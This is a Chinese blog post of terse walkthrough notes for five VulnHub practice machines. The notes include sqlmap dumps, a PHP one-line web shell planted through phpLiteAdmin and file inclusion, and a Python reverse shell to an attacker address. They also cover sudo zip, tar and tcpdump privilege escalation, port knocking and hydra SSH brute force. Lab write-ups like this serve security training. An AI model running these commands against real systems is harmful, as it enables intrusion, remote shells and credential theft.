vulnhub 5

最新推荐文章于 2023-04-04 15:23:18 发布
最新推荐文章于 2023-04-04 15:23:18 发布
阅读量541 收藏 1
点赞数 1
分类专栏: 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34640691/article/details/113607137
版权

目录

 

pinkys-palace-v1,225

1.端口扫描

2.访问8080端口显示403,使用代理后尝试

3.ssh登录pinkymanage用户

4.提权

zico2-1,210

1.端口扫描

​2.查看web服务,存在本地文件包含漏洞

​3.利用phpliteadmin漏洞写入一句话

4.切换至zico账号进行提权

lord-of-the-root-101,129

1.端口扫描和端口碰撞

​2.查看1337端口

3.sqlmap爆破数据库

4.ssh登录

​5.提权

tr0ll-1,100

1.端口扫描

​2.利用ftp

​3.分析pcap包

4.下载分析文件

5.提权

web-developer-1,288

1.端口扫描

​2.目录爆破,访问ipdata

​3.wireshark分析analyze.cap

​4.ssh登录,提权获取flag

pinkys-palace-v1,225

1.端口扫描

2.访问8080端口显示403,使用代理后尝试

gobuster进行爆破

gobuster dir -p http://192.168.43.113:31337 -u http://127.0.0.1:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

sql注入

sqlmap -u http://127.0.0.1:8080/littlesecrets-main/login.php --level=3 --proxy http://192.168.43.113:31337 --data="user=admin&pass=admin" -D pinky_sec_db -T users -C uid,user,pass --dump-all --batch --threads 10

3.ssh登录pinkymanage用户

网站根目录存在pinky的密钥,保存后登录pinky账号

cat .ultrasecret | base64 -d

将密钥复制到本地

4.提权

 

zico2-1,210

1.端口扫描

2.查看web服务,存在本地文件包含漏洞

目录爆破

gobuster dir -u http://192.168.43.11 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

尝试登录phpLiteAdmin

3.利用phpliteadmin漏洞写入一句话

<?php echo system($_GET["cmd"]);?>    #写入一句话
http://192.168.43.11/view.php?page=../../../../../..//usr/databases/1.php&cmd=pwd

http://192.168.43.11/view.php?page=../../../../../..//usr/databases/1.php&cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.43.2",5522));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'    #反弹shell

查看wordpress配置文件

4.切换至zico账号进行提权

zip提权

touch /tmp/exploit
sudo -u root zip /tmp/exploit.zip /tmp/exploit -T --unzip-command="sh -c /bin/bash"

tar提权

sudo /bin/tar cf /dev/null /pwnd --checkpoint=1 --checkpoint-action=exec=/bin/bash

 

lord-of-the-root-101,129

1.端口扫描和端口碰撞

hping3 -S 192.168.43.170 -p 1 -c 1 
hping3 -S 192.168.43.170 -p 2 -c 1 
hping3 -S 192.168.43.170 -p 3 -c 1

2.查看1337端口

robots页面有base64编码内容,进行解码

3.sqlmap爆破数据库

 sqlmap -o -u "http://192.168.43.170:1337/978345210/index.php" --forms -D Webapp -T Users -C id,username,password --dump --batch

4.ssh登录

5.提权

 

tr0ll-1,100

1.端口扫描

2.利用ftp

3.分析pcap包

4.下载分析文件

访问0x0856BF目录

hydra爆破ssh

hydra -L user.txt -p pass.txt 192.168.43.11 ssh

5.提权

 

web-developer-1,288

1.端口扫描

2.目录爆破,访问ipdata

3.wireshark分析analyze.cap

查看http协议中的post请求

4.ssh登录,提权获取flag

webdeveloper@webdeveloper:/tmp$ touch exploit
webdeveloper@webdeveloper:/tmp$ echo 'cat /root/flag.txt' > /tmp/exploit
webdeveloper@webdeveloper:/tmp$ chmod +x /tmp/exploit
webdeveloper@webdeveloper:/tmp$ 
webdeveloper@webdeveloper:/tmp$ sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root

 

 

 

kongkong空
关注
专栏目录
VulnHub DC:5
spider的博客
12-06 226
靶机192.168.1.226 nmap起手。 nmap -sT -sV -o ./sC 192.168.1.226 -p -
pyexp靶机总结
qq_45301512的博客
01-08 614
靶机下载地址:打开靶机.使用nmap扫描出靶机的ip和开放的端口可以看到,靶机开放了1337端口和3306端口1337端口是ssh的端口,3306是mysql数据库的端口根据之前做靶机的经验来看,一般是开放80端口,然后根据网站去找到合适的方法getshell,但是这里没有开放80端口,因此只能考虑1337端口和3306端口那么先对这两个端口进行爆破一波,看是否能爆破出登录的密码由于不知道存在什么用户,因此只能先尝试root用户的爆破。
djinn 1:针对1337端口的自动化脚本
weixin_52641450的博客
02-17 228
djinn 1:针对1337端口的自动化脚本
vulnhub靶机-djinn
臭nana的博客
06-27 981
1、找到靶机ip:192.168.0.108
phpliteadmin <= 1.9.3 远程php代码执行漏洞测试
weixin_34112208的博客
01-12 1105
漏洞来自:http://www.exploit-db.com/exploits/24044/本文仅仅是简单测试了一下,没有啥技术含量…… 感觉这个还是用于提权获取webshell,因为需要登录phpLiteAdmin,还需要有创建数据库权限。 ...
tcp/udp 常用端口列表
whatday的专栏
05-20 1万+
计算机之间依照互联网传输层TCP/IP协议不同的协议通信,都有不同的对应端口。所以,利用短信(datagram)的UDP,所采用的端口号码不一定和采用TCP的端口号码一样。以下为两种通信协议的端口列表链接: 端口状态颜色图例 以下方块,以如下颜色和标签,标明了端口的状态: 使用状态 叙述 颜色 官方 应用与端口组合记录在IANA的端口分配列表中[1] 白 非官方 应用与端口组合不在IANA的端口分配列表中; 蓝 多重使用 已知多个应用程...
VulnHub
02-10
5. 尼维奥: 这可能是机器的名称或者是某个特定的挑战,需要进一步的信息来理解其含义。 6. 1个: 这可能是指2021年的第一个项目,或者表示有至少一个相关的文件或资源。 7. 2021年: 再次强调这些资源的发布时间。 8. ...
Vulnhub靶场题解
08-24
5. 提升权限:渗透成功后,往往需要在已获取的用户权限的基础上进一步提升权限,尝试获取系统的root或管理员权限。 6. 数据提取:获取到系统最高权限后,渗透测试者的最后任务是寻找并提取flag,这通常是一个隐藏的...
vulnhub-Nagini.txt
06-10
Nagini
Vulnhub篇potato.zip
01-12
Vulnhub篇potato靶机,靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的过程文档,供大家参考学习
HackTheBox - Nineveh Write Up
ak.Gh0st的博客
04-04 218
HackTheBox - Nineveh Write Up
穿越边境的姿势
weixin_44448194的博客
01-21 282
在企业安全对抗中,红方攻击团队经常会遇到这种情况,在企业的网络边界上获取到部分权限,比如一个web服务器的webshell,然而如何更方便的进行下一步的渗透呢?如何对内网进行渗透测试,这时就需要隧道转发技术,穿透边界防火墙、安全代理等安全设备,进行深层次的安全测试。本文的主要内容是穿透内网的各种姿势。 典型的边界网络架构图 利用ssh建立隧道动态端口转发 原理:建立一个动态的SOCKS4/5的代理...
vulnhub zico2: 1
箭雨镜屋
11-27 2909
本文攻击路径是:nmap扫描-->访问80端口发现文件包含漏洞-->dirb扫描网站目录-->利用默认密码登录phpLiteAdmin-->利用phpLiteAdmin 1.9.3的漏洞结合文件包含漏洞getshell-->脏牛提权(或者sudo tar提权)
[Hack The Box]靶机2 Backdoor
Huamang的博客
03-25 3156
nmap先嗦一把,开了22端口、80端口和1337端口 访问是一个wordpress博客网站 wpscan扫一下 版本是5.8.1 再看看网站,这里会跳转backdoor.htb,配置一下hosts echo 10.10.11.125 backdoor.htb >> /etc/hosts 扫一下目录 这里有目录遍历 这里有一个eBook-download的插件 在readme里面看到版本信息,找找看有没有什么漏洞 版本好像是1.1 的确有漏洞,任意文件下载 拿到一个数据库的.
DC-3 靶机
weixin_63492470的博客
03-11 5478
DC-3 DC-3 | Five86 | DC Challenges (靶机下载地址) 环境:DC-3靶机地址:192.168.1.152 kali地址:192.168.1.176 都是桥接模式 1 .收集信息 nmap -sP 192.168.1.0/24 nmap -A 192.168.1.152 #发现joomla内容管理系统 访问 192.168.1.152 #发现 提示只有一个入口,让我们提权为root用户 知道网站用的是joomla cms,那我们就可以使用
常用端口号
Infor_learning的博客
12-22 3万+
http://zh.wikipedia.org/wiki/TCP/UDP%E7%AB%AF%E5%8F%A3%E5%88%97%E8%A1%A8 TCP/UDP端口列表 维基百科,自由的百科全书 跳转至: 导航、 搜索 计算机之间依照互联网传输层TCP/IP协议不同的协定通信,都有不同的对应端口。所以,利用短信(datagram)的UDP,所采用的端口号码不一定和采用TCP
TCP/UDP 常用端口列表
热门推荐
NULL BLOG
12-08 10万+
计算机之间依照互联网传输层TCP/IP协议不同的协议通信,都有不同的对应端口。所以,利用短信(datagram)的UDP,所采用的端口号码不一定和采用TCP的端口号码一样。以下为两种通信协议的端口列表链接: 目录  [隐藏]  1 端口状态颜色图例2 0到1023号端口3 1024到49151号端口4 49152到65535号端口5 参考文献6 相关7 外
hackthebox-Nineveh(考点:hydra/phpliteadmin/LFI/图片密码/端口敲门/chkrootkit)
冬萍子癸水
04-10 642
nmap 80/443都是网页,一个http,一个https 两个都打开看看,并dirbuster扫扫 80打开department是登录框。 没有别的什么信息。应该只有暴力破解了。 ctrl+u再看看, 说登录页有问题,那可以SQL注入么? 试了几种却不行。。 只有暴力干它了,还好这里有提示admin账号和amrois用户应该存在,不然连用户名都得暴力破解,浪费时间。。 burp抓包,获得...
vulnhub sar
最新发布
09-09
vulnhub sar是一个类似OSCP的虚拟机,它旨在帮助用户提高和巩固渗透测试的知识点。如果你想下载sar靶机,你可以在GitHub上找到它,具体来说,你可以在pentestmonkey的php-reverse-shell存储库中找到它。如果你已经...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值